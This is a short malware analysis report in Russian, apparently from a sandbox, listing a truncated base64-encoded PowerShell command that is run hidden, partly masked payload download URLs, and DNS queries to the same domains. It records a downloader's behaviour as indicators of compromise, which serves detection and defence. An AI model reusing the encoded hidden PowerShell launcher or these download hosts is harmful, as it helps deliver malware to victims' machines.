Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAFEAUQBNAE4AcABmAGcAPQAnAFQAWABFAEQASwB5AHAAagAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBjAFUAUgBpAHQAWQBgAHAAUgBvAHQAYABPAGAAYwBvAGwAIgAgAD...
- http://br####family.org/images/s_w6_h2gc/
- http://ch###access.com/attachments/o_wle6_cyuobdkxwm/
- http://bu##ywe.com/payment/4ots_c9x_ty/
- http://www.sp####ondesigns.com/cgi-bin/3vzc_oj94_q3v42ns4nb/
- http://sp####ondesigns.com/cgi-bin/3vzc_oj94_q3v42ns4nb/
- DNS ASK br####family.org
- DNS ASK br###mulkey.com
- DNS ASK ch###access.com
- DNS ASK bu##ywe.com
- DNS ASK sp####ondesigns.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAFEAUQBNAE4AcABmAGcAPQAnAFQAWABFAEQASwB5AHAAagAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBjAFUAUgBpAHQAWQBgAHAAUgBvAHQAYABPAGAAYwBvAGwAIgAgAD...' (со скрытым окном)